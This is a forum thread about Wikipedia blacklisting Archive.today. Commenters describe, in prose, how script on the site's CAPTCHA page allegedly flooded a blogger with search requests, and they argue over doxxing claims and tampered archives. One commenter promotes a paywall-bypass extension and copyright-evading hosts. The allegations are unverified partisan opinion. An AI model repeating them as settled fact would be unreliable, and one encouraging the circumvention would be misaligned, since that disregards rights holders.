Wikipedia blacklists Archive.today, starts removing 695,000 archive links

m3t00🌎🇺🇦@lemmy.world · edit-2 2 hours ago

Wikipedia blacklists Archive.today, starts removing 695,000 archive links

Ganbat@lemmy.dbzer0.com · 3 hours ago

For anyone curious, I looked into the DDOSing, and what was done is a simple string of JavaScript was added to archive[.]today that made a background request to the blog with a randomly generated search parameter. Every time someone looked at an archive, they unknowingly sent a request to the blog under attack.

Snot Flickerman@lemmy.blahaj.zone · edit-2 3 hours ago

As someone who uses Bypass Paywalls Clean, this is so frustrating.

Bypass Paywalls Clean was chased off of the Firefox Add-Ons site, chased off of Gitlab, and chased off of Github via DMCA takedown notices for copyright infringement. It is now hosted on the Russian Gitflic.ru.

We all know Russia sucks in a litany of ways, but one way it doesn’t suck is that it is one of the few countries left that has really thrown all caution to the wind and absolutely said “fuck it” in terms of respecting the international Big Copyright norms as promoted by and deeply influenced by the USA copyright cabal (RIAA/MPAA).

We have spent the better part of two decades dealing with the DMCA being used as an outright weapon to silence information that corporations and government find inconvenient mostly because that information is wildly incriminating for them. It works especially strongly because a large amount of the world’s internet has been consolidated to the US and its vast hosting structures like AWS and Cloudflare, putting enormous amounts of the internet under the direct influence of US laws like the DMCA.

Websites like Anna’s Archive, Libgen, and Sci-Hub live because they use hosting in countries that allow them to bypass these kind of restrictions. Russia is one of the most common countries for them to host the data out of due to the lack of enforcement of copyright laws, although it is obviously not the only country that these sites use.

Until we are able to alter international copyright protections to be reasonable instead of their current over-zealously and aggressively abusive nature, we will all suffer having to risk hosting of such sites in countries that are otherwise very unsavory to be associating with.

We live in the kind of world early piracy pioneers such as the original creators of The Pirate Bay were trying to fight from becoming a reality. The American copyright cabal fought tooth and nail to change Sweden’s interpretations of copyright law so they could send these men to prison.

yucandu@lemmy.world · 4 hours ago

hey thanks, i had never heard of that bypass paywalls firefox addon

Snot Flickerman@lemmy.blahaj.zone · 4 hours ago

There’s also a version for Chrome if you swing that way.

yucandu@lemmy.world · 4 hours ago

I do not because I don’t like ads on Youtube, but thx.

4am@lemmy.zip · edit-2 3 hours ago

If this is not an announcement, Lemmy lets you edit your post titles so you can correct that mistake instead of luring in people who think lemmy.world is also banning links using archive.today.

I’m not speculating on your intent, only pointing out that you can correct this situation instead of apologizing after the fact.

Tony Bark@pawb.social · 2 hours ago

I’ve switched to .md when the community mentioned something was up with the .today domain. Hopefully that one isn’t compromised.

The_Decryptor@aussie.zone · 2 hours ago

It’s the same person running all of them, so yeah it is.

Tony Bark@pawb.social · 2 hours ago

Damn.

betterdeadthanreddit@lemmy.world · 2 hours ago

URL
archive[.]today
archive[.]fo
archive[.]is
archive[.]li
archive[.]md
archive[.]ph
archive[.]vn
archiveiya74codqgiixo33q62qlrqtkgmcitqx5u2oeqnmn5bpcbiyd[.]onion

Source

brianpeiris@lemmy.ca · 5 hours ago

Good reminder to donate to web.archive.org

mayabuttreeks@lemmy.ca · 1 hour ago

I do hope this move results in more support for the IA/Wayback Machine and helps them to update some of their crawler tech — thanks to the rise of AI, some sites are effectively (thru captchas etc.) or actively (through straight-up greed [coughRedditcough]) blocked from being archived almost entirely, which is frustrating for legit archivists/contributors.

Zedstrian@sopuli.xyz · 2 hours ago

While archive.org is good and more trustworthy than archive.is, it isn’t as useful for bypassing paywalls.

dan@upvote.au · 6 hours ago

This is understandable, but at the same time, none of the anti-paywall lists are as good as archive.today. They actually have paid accounts at a bunch of paywalled sites, and use them when scraping.

CombatWombat@feddit.online · 5 hours ago

Unfortunately, they’ve allegedly modified the contents of some archived articles, so even though they may do better to archive, nothing archived is of any value because it cannot be trusted.

betterdeadthanreddit@lemmy.world · 5 hours ago

m3t00🌎🇺🇦@lemmy.world · edit-2 5 hours ago

https://lemmy.world/c/ukraine was where i saw this. i didn’t write it. thought lemmy would have linked to the original, was wrong. FYI

Maeve@kbin.earth · 5 hours ago

Democracy died in daylight, the darkness hides the rotten body.

RobotToaster@mander.xyz · 5 hours ago

Everyone seems to be ignoring the fact that he only did this in response to a malicious dox attempt.

Em Adespoton@lemmy.ca · 4 hours ago

He only modified archived pages in response to a dox attempt?

And the thing is, the discovery of the modified pages revealed that it wasn’t even the first time he’d modified pages. And he used a real person’s identity to try and shift blame.

Irrespective of the doxxing allegations, if he’s done all this multiple times already, it means the page archives can’t be trusted AND there’s no guarantee that anything archived with the service will be available tomorrow.

Seems like we need to switch to URLs that contain the SHA256 of the page they’re linking to, so we can tell if anything has changed since the link was created.

Anon518@sh.itjust.works · 4 hours ago

Unfortunately, they shot themselves in the foot by responding the way they did. They basically did the job of anyone who wants them taken down and not trusted. It was probably the worst way they could have reacted. Such a tragedy to lose such a valuable website.

dan@upvote.au · 5 hours ago

It wasn’t a dox attempt though. The blog just collected information that was already publicly available on other sites.

betterdeadthanreddit@lemmy.world · 5 hours ago

As they should since it doesn’t matter.

Snot Flickerman@lemmy.blahaj.zone · edit-2 5 hours ago

Yeah, someone being shitty to you doesn’t mean go you full-fledged shitty in return, it kind of proves your lack of trustworthiness to begin with. It’s like Nazis being like “leftists were mean to me by explaining how my politics made me a Nazi, so I’m gonna show them by Nazi-ing even harder! They forced me to be like this!” It kind of betrays the argument that the reason you got that way was because leftists were mean to you.

5 hours ago

Bro any archiving/scraping tool can be used for ddos u just tell it to archive the same site over and over and now u have a different IP spamming the endpoint

dan@upvote.au · edit-2 5 hours ago

In this case, their CAPTCHA page intentionally included code to DoS a particular blog, sending a request to search for a random string every 300ms (search is very CPU-intensive). This was regardless of the archived site you were trying to view.

CombatWombat@feddit.online · 5 hours ago

Any good archiver will check for an archived copy before making a request, and batch requests. This was very different than the attack you’re imagining — if you opened any archive.today page, it would poll a developer’s personal blog, regardless of whether you were interacting with content from that blog.

m3t00🌎🇺🇦@lemmy.world · 5 hours ago

don’t know all the details. fyi basically. i forget where i saw the same site mentioned for the same thing. don’t call me bro Bro